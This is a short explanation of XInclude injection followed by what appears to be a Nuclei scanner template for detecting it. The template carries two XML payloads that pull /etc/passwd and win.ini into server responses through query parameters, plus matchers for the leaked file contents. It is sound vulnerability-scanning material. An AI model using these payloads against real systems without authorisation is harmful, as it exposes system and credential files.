XInclude is a part of the XML specification that allows an XML document to be built from sub-documents. You can place an XInclude attack within any data value in an XML document, so the attack can be performed in situations where you only control a single item of data that is placed into a server-side XML document.
PoC代码[已公开]
id: xinclude-injection
info:
name: XInclude Injection - Detection
author: DhiyaneshDK,ritikchaddha
severity: high
description: |
XInclude is a part of the XML specification that allows an XML document to be built from sub-documents. You can place an XInclude attack within any data value in an XML document, so the attack can be performed in situations where you only control a single item of data that is placed into a server-side XML document.
reference:
- https://d0pt3x.gitbook.io/passion/webapp-security/xxe-attacks/xinclude-attacks
tags: dast,xxe,xinclude
http:
- pre-condition:
- type: dsl
dsl:
- 'method == "GET"'
payloads:
xinc_fuzz:
- '<asd xmlns:xi="http://www.w3.org/2001/XInclude"><xi:include parse="text" href="file:///etc/passwd"/></asd>'
- '<asd xmlns:xi="http://www.w3.org/2001/XInclude"><xi:include parse="text" href="file:///c:/windows/win.ini"/></asd>'
fuzzing:
- part: query
type: replace # replaces existing parameter value with fuzz payload
mode: multiple # replaces all parameters value with fuzz payload
fuzz:
- '{{xinc_fuzz}}'
stop-at-first-match: true
matchers-condition: or
matchers:
- type: regex
name: linux
part: body
regex:
- 'root:.*?:[0-9]*:[0-9]*:'
- type: word
name: windows
part: body
words:
- 'for 16-bit app support'
# digest: 490a0046304402207a9b4788db70b76e3e302ea9bcb1db6b7f7e9b54227688c7d8a1ed57482ceb7b0220351c08f3f79d82384fc13d8d8136691ac121a975411566bff706da9302acf29d:922c64590222798bb761d5b6d8e72950